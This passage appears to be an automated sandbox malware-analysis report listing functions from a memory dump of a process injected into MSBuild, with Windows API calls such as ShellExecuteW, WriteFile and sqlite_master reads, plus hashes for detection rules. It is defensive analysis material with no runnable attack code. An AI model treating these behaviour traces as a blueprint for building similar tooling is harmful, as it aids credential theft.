Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99

Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412057

Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
GetKeyState.USER32(00000010), ref: 0041210D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14

Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F561
memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6

Strings

g4@, xrefs: 0040F583, 0040F520

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$free
String ID: g4@
API String ID: 2888793982-2133833424
Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04

Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D

Strings

@, xrefs: 00412A0B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9

Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
memset.MSVCRT ref: 0040AF18
memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
??3@YAXPAX@Z.MSVCRT ref: 0040AF31

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55

Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144E7

Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
memset.MSVCRT ref: 0041451A
GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D

Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
memset.MSVCRT ref: 0042FED3
memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04

Strings

sqlite_master, xrefs: 0042FE9C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795

Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00414D9A
SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
wcscpy.MSVCRT ref: 00414DF3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64

Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C

_snwprintf.MSVCRT ref: 00410FE1
SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

_snwprintf.MSVCRT ref: 0041100C
wcscat.MSVCRT ref: 0041101F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D

Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
malloc.MSVCRT ref: 00417459
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
free.MSVCRT ref: 0041747F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6

Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00412403
RegisterClassW.USER32(?), ref: 00412428
GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID:
API String ID: 2678498856-0
Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9

Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00409B40
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64

Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417B7B
UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
GetLastError.KERNEL32 ref: 00417BB5

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$ErrorLastLockUnlockmemset
String ID:
API String ID: 3727323765-0
Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65

Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F673
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
strlen.MSVCRT ref: 0040F6A2
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D

Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F6E2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
strlen.MSVCRT ref: 0040F70D
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8

Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402FD7
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
strlen.MSVCRT ref: 00403006
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9

Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7

SetBkMode.GDI32(?,00000001), ref: 004143A2
SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
SetTextColor.GDI32(?,00C00000), ref: 004143BE
GetStockObject.GDI32(00000000), ref: 004143C6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759

Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65

Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
GetModuleHandleW.KERNEL32(00000000), ref: 00413505
DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D

Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 0044DF01
??3@YAXPAX@Z.MSVCRT(?), ref: 0044DF11
??3@YAXPAX@Z.MSVCRT(?), ref: 0044DF21
??3@YAXPAX@Z.MSVCRT(?), ref: 0044DF31

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D

Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1

Strings

d=E, xrefs: 00411E4B, 00411E65, 00411E51

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID: d=E
API String ID: 909852535-3703654223
Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D

Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040F79E
wcschr.MSVCRT ref: 0040F7AC

Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB

Strings

", xrefs: 0040F7E8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99

Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A

_memicmp.MSVCRT ref: 0040C00D
memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024

Strings

URL , xrefs: 0040C007

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FilePointer_memicmpmemcpy
String ID: URL
API String ID: 2108176848-3574463123
Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9

Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040A398
memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8

Strings

%2.2X , xrefs: 0040A38D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96

Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040F9E3
_snwprintf.MSVCRT ref: 0040FA03

Strings

%%-%d.%ds , xrefs: 0040F9D8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65

Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E770
SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F

Strings

F^@, xrefs: 0040E795

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSendmemset
String ID: F^@
API String ID: 568519121-3652327722
Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
